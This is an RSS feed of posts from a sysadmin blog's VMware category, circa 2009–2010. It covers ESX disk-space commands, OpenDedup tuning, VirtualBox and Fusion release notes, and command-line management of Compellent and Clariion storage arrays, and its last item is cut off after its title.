<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Krypted &#187; VMware</title>
	<atom:link href="http://krypted.com/category/vmware/feed/" rel="self" type="application/rss+xml" />
	<link>http://krypted.com</link>
	<description>Notes from the field</description>
	<lastBuildDate>Wed, 28 Jul 2010 03:19:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Checking Free Space in vSphere</title>
		<link>http://krypted.com/vmware/checking-free-space-in-esx/</link>
		<comments>http://krypted.com/vmware/checking-free-space-in-esx/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 15:00:55 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[VMware]]></category>
		<category><![CDATA[ESX]]></category>
		<category><![CDATA[free space]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[vdf]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5923</guid>
		<description><![CDATA[Most of us will be familiar with the df command. But in ESX, you use the vdf command, located in /usr/sbin. Running the vdf command will net you similar output to what you see with df. Simply run the following to see free space on each of your disks:
vdf -h
You can also list all of [...]]]></description>
			<content:encoded><![CDATA[<p>Most of us will be familiar with the df command. But in ESX, you use the vdf command, located in /usr/sbin. Running the vdf command will net you similar output to what you see with df. Simply run the following to see free space on each of your disks:</p>
<blockquote><p>vdf -h</p></blockquote>
<p>You can also list all of your data stores to correlate the vdf output with esxcfg:</p>
<blockquote><p>/usr/sbin/esxcfg-scsidevs	-c</p></blockquote>
<p>Or to list LUNs:</p>
<blockquote><p>/usr/sbin/esxcfg-mpath	-L</p></blockquote>
<p>BTW, if you&#8217;re running out of free space, in my experience, first look to your snapshots and check how much space they&#8217;re consuming&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/vmware/configuring-the-esx-firewall/" rel="bookmark" title="April 14, 2009">Configuring the ESX Firewall</a></li>
<li><a href="http://krypted.com/mac-os-x/piping-commands/" rel="bookmark" title="October 11, 2009">Piping Commands</a></li>
<li><a href="http://krypted.com/mac-os-x/truecrypt/" rel="bookmark" title="April 15, 2007">TrueCrypt</a></li>
<li><a href="http://krypted.com/ubuntu/looking-into-google-androids-internals/" rel="bookmark" title="July 28, 2009">Looking at Google Android&#039;s Internals</a></li>
<li><a href="http://krypted.com/mac-os-x/directory-listing-with-permissions/" rel="bookmark" title="February 15, 2005">Directory Listing with Permissions</a></li>
</ul>
<p><!-- Similar Posts took 9.818 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/vmware/checking-free-space-in-esx/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Goodbye OpenSolaris/OpenStorage, Hello OpenFiler/OpenDedup</title>
		<link>http://krypted.com/ubuntu/goodbye-opensolarisopenstorage-hello-openfileropendedup/</link>
		<comments>http://krypted.com/ubuntu/goodbye-opensolarisopenstorage-hello-openfileropendedup/#comments</comments>
		<pubDate>Fri, 02 Apr 2010 15:00:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[FOSS]]></category>
		<category><![CDATA[opendedup]]></category>
		<category><![CDATA[OpenSolaris]]></category>
		<category><![CDATA[openstorage]]></category>
		<category><![CDATA[Solaris]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5885</guid>
		<description><![CDATA[I&#8217;ve read a number of reports over the past couple of days that indicate the demise of Project Wonderland and Open Solaris. As it is open source I would not be surprised to see the project continue, even if forked and retitled in some way. Oracle will continue selling Solaris, but &#8220;nothing is for free&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve read a number of reports over the past couple of days that indicate the demise of Project Wonderland and Open Solaris. As it is open source I would not be surprised to see the project continue, even if forked and retitled in some way. Oracle will continue selling Solaris, but &#8220;nothing is for free&#8221; is about to take on a whole new meaning. For now it seems that any plans around packaging services around the FOSS stack surrounding former Sun products should be put on hold until further official announcements are made.</p>
<blockquote><p>&#8220;So now, less than five years later, you can go up on a steep hill in Las Vegas and look west, and with the right kind of eyes you can almost see the high-water mark &#8211; that place where the wave finally broke and rolled back.&#8221;</p>
<p>&#8211;Hunter S. Thompson</p></blockquote>
<p>Goodbye Sun. You will be sorely missed.</p>
<p>Moving on. For what it is worth I&#8217;m in the process of migrating the non-Mac SAN portion of my home lab to Debian with a little OpenDedup and OpenFiler until I can decide which to centralize my VMs onto. For now I&#8217;m mostly looking to see how much deduplication occurs with the VMs. I ran into an issue where the VMs were unstable with my OpenDedup volume. I was able to fix this by disabling deduplication. To do so, you edit the VOLUMENAME-volume-cfg.xml file (transposing your volume name for VOLUMENAME), editing the dedup-files=&#8221;true&#8221; to read dedup-files=&#8221;false&#8221;.</p>
<p>Turned out that my issue was in part a latency issue with the location of the deduplication database, which I then mv&#8217;d to an SSD drive and edited the dedup-db-store and meta-db-store to point at the new location. Then I re-enabled dedup-files and my VMs were working again. I also ended up increasing my max-open-files to 2048, also in that same file. The other issue was with the fact that I was doing inline deduplication. To fix that, I switched to batch deduplication. According to the documentation this is preferred for most environments that aren&#8217;t backup targets.</p>
<p>Overall I&#8217;ve been pretty happy with OpenDedup and really only just begun testing OpenFiler. In my initial tests I&#8217;m very satisfied with the block level replication, the ease with which you create iSCSI targets and snapshots. I&#8217;m actually finding the transition to OpenFiler easier than the learning curve was with OpenStorage (how hard can anything with a GUI really be?), although I am intrigued by the savings with OpenDedup and given its learning curve, continue to tinker when I can.</p>
<p>Final note, if you want to run a snapshot of your OpenDedup volume, use the following (assuming your data destination is /my/destination and the source location that you will be creating a snapshot of is /my/source) then use or script the following to run on timed intervals:</p>
<blockquote><p>setfattr -n user.cmd.snapshot -v 5555:/my/destination /my/source</p></blockquote>
<p>When I did this there was a slight amount of latency created, although that might be less noticeable when used on better hardware&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/unix/making-the-case-for-solaris/" rel="bookmark" title="September 25, 2008">Making the case for Solaris</a></li>
<li><a href="http://krypted.com/ubuntu/suns-openstorage/" rel="bookmark" title="January 11, 2009">Sun&#039;s OpenStorage</a></li>
<li><a href="http://krypted.com/mac-os-x/beyond-portable-homes/" rel="bookmark" title="December 21, 2009">Beyond Portable Homes</a></li>
<li><a href="http://krypted.com/ubuntu/opensolaris-2009-06-first-impressions/" rel="bookmark" title="July 25, 2009">OpenSolaris 2009.06 First Impressions</a></li>
<li><a href="http://krypted.com/mass-deployment/lisa-2008/" rel="bookmark" title="September 17, 2008">LISA 2008</a></li>
</ul>
<p><!-- Similar Posts took 9.407 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/ubuntu/goodbye-opensolarisopenstorage-hello-openfileropendedup/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>VMware Acquires Zimbra</title>
		<link>http://krypted.com/vmware/vmware-acquires-zimbra/</link>
		<comments>http://krypted.com/vmware/vmware-acquires-zimbra/#comments</comments>
		<pubDate>Tue, 12 Jan 2010 21:18:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[VMware]]></category>
		<category><![CDATA[Zimbra]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5607</guid>
		<description><![CDATA[See the Zimbra site for more information:
http://www.zimbra.com
Mail has to live somewhere &#8211; might as well be on an EMC&#8230;Similar Articles:

iPhone and GroupWise
VMware vExpert 2009
VMware Fusion 3 Right Around the Corner
Looking at Google Android&#039;s Internals
Paul Maritz Speaks Out on VMware Issue


Copyright &#169; 2008 This feed is for personal, non-commercial use only.  The use of this [...]]]></description>
			<content:encoded><![CDATA[<p>See the Zimbra site for more information:<br />
<a href="http://www.zimbra.com">http://www.zimbra.com</a></p>
<p>Mail has to live somewhere &#8211; might as well be on an EMC&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/kerio/iphone-and-groupwise/" rel="bookmark" title="June 3, 2009">iPhone and GroupWise</a></li>
<li><a href="http://krypted.com/certifications/vmware-vexpert-2009/" rel="bookmark" title="February 25, 2009">VMware vExpert 2009</a></li>
<li><a href="http://krypted.com/mac-os-x/vmware-fusion-3-right-around-the-corner/" rel="bookmark" title="October 9, 2009">VMware Fusion 3 Right Around the Corner</a></li>
<li><a href="http://krypted.com/ubuntu/looking-into-google-androids-internals/" rel="bookmark" title="July 28, 2009">Looking at Google Android&#039;s Internals</a></li>
<li><a href="http://krypted.com/vmware/paul-maritz-speaks-out-on-vmware-issue/" rel="bookmark" title="August 11, 2008">Paul Maritz Speaks Out on VMware Issue</a></li>
</ul>
<p><!-- Similar Posts took 4.763 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/vmware/vmware-acquires-zimbra/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Monitoring Amazon ec2 Instances</title>
		<link>http://krypted.com/ubuntu/monitoring-amazon-ec2-instances/</link>
		<comments>http://krypted.com/ubuntu/monitoring-amazon-ec2-instances/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 14:00:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[cloud monitor]]></category>
		<category><![CDATA[cloud watch]]></category>
		<category><![CDATA[intermapper]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5489</guid>
		<description><![CDATA[InterMapper has a solution for monitoring instances of the popular Amazon cloud solution, ec2. Using InterMapper&#8217;s Cloud Monitor, you can monitor up to 5 virtual machines that are running for free. If you are just getting started and find that you would like some visibility into the performance of your ec2 instances then this solution [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;">InterMapper has a solution for monitoring instances of the popular Amazon cloud solution, <a href="http://krypted.com/active-directory/getting-started-with-amazons-ec2-cloud/">ec2</a>. Using <a href="http://www.intermapper.com/products/ec2-monitoring">InterMapper&#8217;s Cloud Monitor</a>, you can monitor up to 5 virtual machines that are running for free. If you are just getting started and find that you would like some visibility into the performance of your ec2 instances then this solution is one that will allow you to get into the testing and management without having to incur a large expenditure.</p>
<p style="text-align: left;">
<img class="aligncenter" title="Intermapper &amp; CloudWatch" src="http://aws.typepad.com/files/console_cpu_large.png" alt="" width="350" height="225" /><br />
And Cloud Monitor is build on top of Amazon&#8217;s Cloud Watch, meaning that it provides the most granular and up-to-date stats available for your instances, based on Amazon&#8217;s own tools. I&#8217;ve been finding that when you&#8217;re transitioning assets into ec2 that Cloud Monitor is a great tool to have at your disposal!</p>
<p><strong>Similar Articles:</strong>
<ul class="similar-posts">None Found
</ul>
<p><!-- Similar Posts took 4.452 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/ubuntu/monitoring-amazon-ec2-instances/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Click-Matrix Leads to Death of a Trackpad</title>
		<link>http://krypted.com/mass-deployment/click-matrix-leads-to-death-of-a-trackpad/</link>
		<comments>http://krypted.com/mass-deployment/click-matrix-leads-to-death-of-a-trackpad/#comments</comments>
		<pubDate>Fri, 18 Dec 2009 13:00:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mass Deployment]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[click-matrix]]></category>
		<category><![CDATA[MacBook Pro]]></category>
		<category><![CDATA[touchfreeze]]></category>
		<category><![CDATA[usability]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5406</guid>
		<description><![CDATA[While preparing an image for the latest MacBook Pro we were going through a click-matrix and I noticed a funny usability issue. Basically, when you fire up VMware and log into the virtual machine, the trackpad keeps getting hit by little hands, which doesn&#8217;t work very well in typing class. I don&#8217;t ask why a [...]]]></description>
			<content:encoded><![CDATA[<p>While preparing an image for the latest MacBook Pro we were going through a click-matrix and I noticed a funny usability issue. Basically, when you fire up VMware and log into the virtual machine, the trackpad keeps getting hit by little hands, which doesn&#8217;t work very well in typing class. I don&#8217;t ask why a piece of software is used in a VM vs. Boot Camp, etc. I just see a design consideration and look for a way to make it better. And in this case, the way to make it better was to disable that trackpad while someone was typing. And to assist, we found this handy-dandy little tool called touchfreeze, which does just that.<br />
<a href="http://code.google.com/p/touchfreeze/">http://code.google.com/p/touchfreeze/</a><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/vmware/vmware-fusion-vmrun/" rel="bookmark" title="June 14, 2007">VMware Fusion: vmrun</a></li>
<li><a href="http://krypted.com/ubuntu/looking-into-google-androids-internals/" rel="bookmark" title="July 28, 2009">Looking at Google Android&#039;s Internals</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-running-non-server-osen-on-vmware/" rel="bookmark" title="July 13, 2008">Mac OS X: Running Non-Server OSen on VMware</a></li>
<li><a href="http://krypted.com/certifications/vmware-vexpert-2009/" rel="bookmark" title="February 25, 2009">VMware vExpert 2009</a></li>
<li><a href="http://krypted.com/vmware/vmware-for-mobile-devices/" rel="bookmark" title="April 11, 2009">VMware for Mobile Devices</a></li>
</ul>
<p><!-- Similar Posts took 6.331 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mass-deployment/click-matrix-leads-to-death-of-a-trackpad/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VirtualBox 3.1 Out &amp; Tested</title>
		<link>http://krypted.com/uncategorized/virtualbox-3-1-out-tested/</link>
		<comments>http://krypted.com/uncategorized/virtualbox-3-1-out-tested/#comments</comments>
		<pubDate>Tue, 01 Dec 2009 14:12:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[Mac OS X Server]]></category>
		<category><![CDATA[Mac Security]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[3.1]]></category>
		<category><![CDATA[iscsi]]></category>
		<category><![CDATA[VirtualBox]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=5157</guid>
		<description><![CDATA[The latest version of VirtualBox is out and it supports a whole slew of bug fixes. In fact, the latest VirtualBox fixes a very specific problem that I&#8217;ve been struggling with, which is the fact that iSCSI LUNs greater than 2 Terabytes would not mount (not that I have many LUNs greater than 2TB in [...]]]></description>
			<content:encoded><![CDATA[<p>The latest version of VirtualBox is out and it supports a whole slew of bug fixes. In fact, the latest VirtualBox fixes a very specific problem that I&#8217;ve been struggling with, which is the fact that iSCSI LUNs greater than 2 Terabytes would not mount (not that I have many LUNs greater than 2TB in my lab but occasionally it does come up). When running on Mac OS X, the following other bug fixes are also included:</p>
<ul>
<li>X11 based hosts: allow the user to specify their own scan code layout (bug #2302)</li>
<li>Mac OS X hosts: don&#8217;t auto show the menu and dock in fullscreen (bug #4866)</li>
<li>Mac OS X hosts (64 bit): don&#8217;t interpret mouse wheel events as left click (bug #5049)</li>
<li>Mac OS X hosts: fixed a VM abort during shutdown under certain conditions</li>
</ul>
<p>Overall, VirtualBox + OpenStorage continues to become a strong offering from Sun and in my labs at least it&#8217;s becoming more and more my weapon of choice for rapid provisioning of test VMs and the management of my lab storage. I&#8217;m not saying I would put hacked up versions of Mac OS X Server as a guest OS (on Apple hardware of course;) in VirtualBox into an actual production environment, BTW (nor condoning doing so in all seriousness)&#8230; Anyway, VirtualBox 3.1 is workin&#8217; like a charm&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/mac-os-x-leopard-what-about-that-zfs-thingie/" rel="bookmark" title="November 6, 2007">Mac OS X Leopard: What About that ZFS Thingie?</a></li>
<li><a href="http://krypted.com/mac-os-x/better-late-than-never/" rel="bookmark" title="August 16, 2008">Better Late than Never</a></li>
<li><a href="http://krypted.com/mac-os-x-server/afp548-article-on-commvaultgrouplogic/" rel="bookmark" title="January 13, 2010">AFP548 Article on CommVault/GroupLogic</a></li>
<li><a href="http://krypted.com/xsan/lunscaping/" rel="bookmark" title="August 18, 2007">LUNscaping</a></li>
<li><a href="http://krypted.com/articles-and-books/self-control-for-mac-os-x/" rel="bookmark" title="April 1, 2009">Self Control for Mac OS X</a></li>
</ul>
<p><!-- Similar Posts took 8.457 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/uncategorized/virtualbox-3-1-out-tested/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Scripting Compellent</title>
		<link>http://krypted.com/mac-os-x/scripting-compellent/</link>
		<comments>http://krypted.com/mac-os-x/scripting-compellent/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 16:00:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[Xsan]]></category>
		<category><![CDATA[Command line]]></category>
		<category><![CDATA[compellent]]></category>
		<category><![CDATA[force]]></category>
		<category><![CDATA[map]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[replay]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4979</guid>
		<description><![CDATA[As with EMC, Compellent allows you to manage servers, volumes, server folders, volume folders, views, and of course mappings programatically. This provides the automation minded engineer with a full-on suite for managing their Compellent-based SAN. All of this is made possible using CompCU.jar. I keep a scripts folder and keep the jar file there, which [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://krypted.com/unix/clariionnavisphere-cli">As with EMC</a>, Compellent allows you to manage servers, volumes, server folders, volume folders, views, and of course mappings programatically. This provides the automation minded engineer with a full-on suite for managing their Compellent-based SAN. All of this is made possible using CompCU.jar. I keep a scripts folder and keep the jar file there, which can initially be downloaded from the Compellent site. Unlike a traditional shell script the scripts are to be placed into a text file and replayed against the SAN.</p>
<p>If you are using VMware or Xen then you can combine the automation in Compellent along with the automation available with the command line interface for those solutions to accomplish some pretty nifty tasks. Simply call up the CompCU.jar inside shell scripts (or powershell scripts) doing automation in VMware to automatically duplicate LUNs and therefore virtual machines. Useful in lab environments and a number of other scenarios, CompCU.jar provides a nice environment and it&#8217;s pretty straight forward to use if you understand the underlying architecture that Compellent uses. For example, the following would run the commands listed in the file called myfile in sequence:<br />
java -jar /scripts/CompCU.jar -s /scripts/myfile</p>
<ul>
<li>c: run command</li>
<li>create x:Creates a LUN of -name</li>
<li>-s replay x:Runs verb against the Compellent of x type</li>
<li>createview: Verb used to create a view based on a replays</li>
<li>force: force event to occur</li>
<li>host: define</li>
<li>last: Repeats the last replay</li>
<li>move: Moves mapped views</li>
<li>name: Names a LUN</li>
<li>password: password to be used when user option is indicated</li>
<li>purge: Delete items from your Recycle Bin</li>
<li>readcache True/False: enables or disables readcache on a LUN</li>
<li>server x: x indicates the name or address of the server you are running your verb against</li>
<li>size x: indicates the size of a LUN</li>
<li>user: user to perform action as</li>
<li>view x: name views</li>
<li>viewexpire x: x sets the expiry for your views</li>
<li>volume x: identifies the volume to use with the verb</li>
<li>writecache True/False: enables or disables writecache on a LUN</li>
</ul>
<p>One thing I&#8217;ve been doing is automating the creation of a volume, mounting it, backing up to it, unmounting it, vaulting it and then after an expiry time, deleting the volume. Without using CompCU.jar I&#8217;m not really sure it would have been possible! Although, Compellent also has a PowerShell command set that offers up even more granularity and can help keep you from having to send data into a text file for the command to run in java while offering more functionality in less commands. I am finding it a little more complicated to use so I just haven&#8217;t played with using PowerShell with it much, but will get back once I get around to it &#8211; but if you have any good commands feel free to post in the comments&#8230;<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/command-line-wiki-integration/" rel="bookmark" title="December 17, 2009">Lots of new stuff: Command Line Wiki Integration</a></li>
<li><a href="http://krypted.com/mac-os-x-server/pcastaction-verbs/" rel="bookmark" title="October 27, 2009">pcastaction verbs</a></li>
<li><a href="http://krypted.com/unix/setting-up-chap-on-lefthand-w-cli/" rel="bookmark" title="May 5, 2010">Setting up CHAP on LeftHand w/ CLI</a></li>
<li><a href="http://krypted.com/mac-os-x/logname-and-whomai/" rel="bookmark" title="March 6, 2005">logname and whomai</a></li>
<li><a href="http://krypted.com/windows-server/stornext-command-line-for-windows/" rel="bookmark" title="May 27, 2009">StorNext Command Line for Windows</a></li>
</ul>
<p><!-- Similar Posts took 5.981 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/scripting-compellent/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clariion/Navisphere CLI</title>
		<link>http://krypted.com/unix/clariionnavisphere-cli/</link>
		<comments>http://krypted.com/unix/clariionnavisphere-cli/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 19:49:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Unix]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[Clariion]]></category>
		<category><![CDATA[CLI]]></category>
		<category><![CDATA[navisphere]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4889</guid>
		<description><![CDATA[A Clariion can be managed using the /opt/Navisphere/bin/navicli command. You can obtain information about the environment using the -h option followed by the IP address of the IP of the Clariion and then a number of get verbs. For example, to get all of the settings for the Clariion at 192.168.210.88:
navicli -h 192.168.210.88 getall
Or to [...]]]></description>
			<content:encoded><![CDATA[<p>A Clariion can be managed using the /opt/Navisphere/bin/navicli command. You can obtain information about the environment using the -h option followed by the IP address of the IP of the Clariion and then a number of get verbs. For example, to get all of the settings for the Clariion at 192.168.210.88:<br />
<code>navicli -h 192.168.210.88 getall</code></p>
<p>Or to get LUN information<br />
<code>navicli -h 192.168.210.88 getlun</code></p>
<p>You can also use getagent, getarrayuid, getcache, getconfig, getcontrol, getcrus, getdisk, getlog, getloop, getrg, getsniffer, getsp, getsptime and while it doesn&#8217;t start with get, lunmapinfo will obtain information about the LUN mappings. For example, to see a LUN mapped to a UID using the same host as above, you would use the following, replacing YOURUID with the UID for the storage group in question<br />
<code>navicli -h 192.168.210.88 storagegroup -list -uid YOURUID</code></p>
<p>One task I always do is to set the name of an array. For e<br />
<code>navicli	-h 192.168.210.88 arrayname KRYPTED_CLARiiON</code></p>
<p>You can also use navicli to manage day to day operations. For example, to clear out logs and statistics you can use the following respectively:<br />
<code>navicli -h 192.168.210.88 clearlog</code><br />
<code>navicli -h 192.168.210.88 clearstats</code></p>
<p>And then you can of course configure any of the devices that you can get information for using the get* commands. For example, to create two RAID groups, you can use the createrg verb, followed by an ID for the group and then the disks that will be part of the RAID group (IDs can be obtained using the getdisk verb).<br />
<code>navicli -h 192.168.210.88 createrg 0 0_0_0 0_0_1 0_0_2 0_0_3 0_0_4</code><br />
<code>navicli -h 192.168.210.88 createrg 1 0_0_5 0_0_6 0_0_7 0_0_8 0_1_0</code></p>
<p>Once you have created RAID groups, you&#8217;ll want to use the bind verb on the new RAID groups, and in so doing tell them what RAID level to run at, with r0, r1 and rb being RAID 0, RAID 1 &#038; RAID 5 respectively. For example to set RAID group 0 and 1 to RAID 5:<br />
<code>navicli -h 192.168.210.88 bind r5 0 -rg 0</code><br />
<code>navicli -h 192.168.210.88 bind r5 0 -rg 1</code></p>
<p>Note: The only flag we were really using was -h. But when you&#8217;re writing scripts against navicli it&#8217;s pretty helpful to use the -m which only shows values as the result of commands, which can cut down on the amount of scripting you have to do&#8230;</p>
<p>Note 2: If you&#8217;re working with an arbitrated loop then also make sure to review the navicli alpha command set. For example:<br />
<code>navicli -h 192.168.210.88 alpa -get</code><strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/unix/setting-up-chap-on-lefthand-w-cli/" rel="bookmark" title="May 5, 2010">Setting up CHAP on LeftHand w/ CLI</a></li>
<li><a href="http://krypted.com/mac-os-x/command-line-system-information/" rel="bookmark" title="April 3, 2009">Command Line System Information</a></li>
<li><a href="http://krypted.com/mac-os-x/reading-address-book-from-the-command-line/" rel="bookmark" title="April 8, 2009">Reading Address Book from the Command Line</a></li>
</ul>
<p><!-- Similar Posts took 4.034 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/unix/clariionnavisphere-cli/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VMware Fusion 3 Right Around the Corner</title>
		<link>http://krypted.com/mac-os-x/vmware-fusion-3-right-around-the-corner/</link>
		<comments>http://krypted.com/mac-os-x/vmware-fusion-3-right-around-the-corner/#comments</comments>
		<pubDate>Fri, 09 Oct 2009 13:00:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Mac OS X]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[aero]]></category>
		<category><![CDATA[automatic updates]]></category>
		<category><![CDATA[fusion]]></category>
		<category><![CDATA[mass deploy]]></category>
		<category><![CDATA[virtual machine]]></category>
		<category><![CDATA[vmware fusion 3]]></category>

		<guid isPermaLink="false">http://krypted.com/?p=4812</guid>
		<description><![CDATA[VMware Fusion is now in pre-order for Fusion 3. What&#8217;s new?

64-bit support for Snow Leopard systems
Support for OpenGL 2.1 and DirectX 9.0c
Unity works with Aero and Flip 3D to further support Windows 7
New migration tools
New command line options
Upgraded Virtual Machine Library
Built-in Automatic Updater
Reduced memory and CPU footprint

Additionally, it looks like we&#8217;ll be updating the mass [...]]]></description>
			<content:encoded><![CDATA[<p>VMware Fusion is now in pre-order for Fusion 3. What&#8217;s new?</p>
<ul>
<li>64-bit support for Snow Leopard systems</li>
<li>Support for OpenGL 2.1 and DirectX 9.0c</li>
<li>Unity works with Aero and Flip 3D to further support Windows 7</li>
<li>New migration tools</li>
<li>New command line options</li>
<li>Upgraded Virtual Machine Library</li>
<li>Built-in Automatic Updater</li>
<li>Reduced memory and CPU footprint</li>
</ul>
<p>Additionally, it looks like we&#8217;ll be updating the mass deployment guide so if you have any updates or points of information that should be added, let us know!<strong>Similar Articles:</strong>
<ul class="similar-posts">
<li><a href="http://krypted.com/mac-os-x/disable-automatic-login-programatically/" rel="bookmark" title="January 9, 2007">Disable Automatic Login Programatically</a></li>
<li><a href="http://krypted.com/certifications/vmware-vexpert-2009/" rel="bookmark" title="February 25, 2009">VMware vExpert 2009</a></li>
<li><a href="http://krypted.com/ubuntu/looking-into-google-androids-internals/" rel="bookmark" title="July 28, 2009">Looking at Google Android&#039;s Internals</a></li>
<li><a href="http://krypted.com/vmware/vmware-for-mobile-devices/" rel="bookmark" title="April 11, 2009">VMware for Mobile Devices</a></li>
<li><a href="http://krypted.com/mac-os-x/mac-os-x-running-non-server-osen-on-vmware/" rel="bookmark" title="July 13, 2008">Mac OS X: Running Non-Server OSen on VMware</a></li>
</ul>
<p><!-- Similar Posts took 14.350 ms --></p>
<hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> )</small>]]></content:encoded>
			<wfw:commentRss>http://krypted.com/mac-os-x/vmware-fusion-3-right-around-the-corner/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Media Temple No Longer Doing Xserve&#039;s</title>
		<link>http://krypted.com/mac-os-x-server/media-temple-no-longer-doing-xserves/</link>
